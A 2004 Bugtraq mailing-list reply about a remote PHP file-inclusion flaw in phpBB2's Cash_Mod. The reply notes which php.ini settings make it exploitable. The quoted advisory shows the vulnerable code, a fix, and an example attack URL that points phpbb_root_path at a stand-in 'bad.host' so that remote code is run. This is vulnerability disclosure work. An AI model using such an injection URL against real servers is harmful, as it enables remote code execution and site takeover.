lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <419CD7DE.1070304@yahoo.es> Date: Thu, 18 Nov 2004 18:11:58 +0100 From: Rafael San Miguel Carrasco <smcsoc@...oo.es> To: bugtraq@...urityfocus.com Subject: Re: Vulnerabilities in forum phpBB2 with Cash_Mod (all ver.) Let me just point out that this vulnerability can only be exploited if two options in php.ini are enabled: - allow_url_fopen - register_globals The first one allows to access and retrieve http resources from fopen; the second lets a user specify GET or POST parameters that will be translated into PHP variables. For more information about PHP insertion and how it can be recognized and exploited: http://www.fistconference.org/data/presentaciones/exploitingwebapplications.tar Greetings. ------------------------------- Rafael San Miguel Carrasco Security Consultant Davinci Consulting ------------------------------- Jerome ATHIAS wrote: >Hi all > >phpBB is a very popular message board using modules extensions. > >One of these module – Cash_Mod is a very popular one and is used by many people. It has critical vulnerabilities, one of them letting anyone inject malicious PHP code that will be executed on the server side. > >Let’s start : > >In file /admin/admin_cash.php > >….. >if ( !empty($setmodules) ) >{ >include($phpbb_root_path . 'includes/functions_cash.'.$phpEx); >$menu = array(); >admin_menu($menu); >…. > >First, nothing seems wrong! It’s just a normal piece of code with “include” functions, but >$phpbb_root_path & .$phpEx – are *NOT* define yet! > > >I don’t know why, but someone decided to define these variables later in the code : > >…… >// >// Let's set the root dir for phpBB >// >$phpbb_root_path = "./../"; >require($phpbb_root_path . 'extension.inc'); >require('./pagestart.' . $phpEx); >include($phpbb_root_path . 'includes/functions_selects.'.$phpEx); > >….. > >Well, any user can rewrite these parameters with GET or POST requests. > >Example : >http://victim.host/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://bad.host/ > > >Fix : >Set all default parameters after “if ( !empty($setmodules) )” > >Example : > >// >// Let's set the root dir for phpBB >// >$phpbb_root_path = "./../"; >require($phpbb_root_path . 'extension.inc'); >require('./pagestart.' . $phpEx); >include($phpbb_root_path . 'includes/functions_selects.'.$phpEx); > >if ( !empty($setmodules) ) >{ >include($phpbb_root_path . 'includes/functions_cash.'.$phpEx); >$menu = array(); >admin_menu($menu); > > >Thank you rofl! > > >
Powered by blists - more mailing lists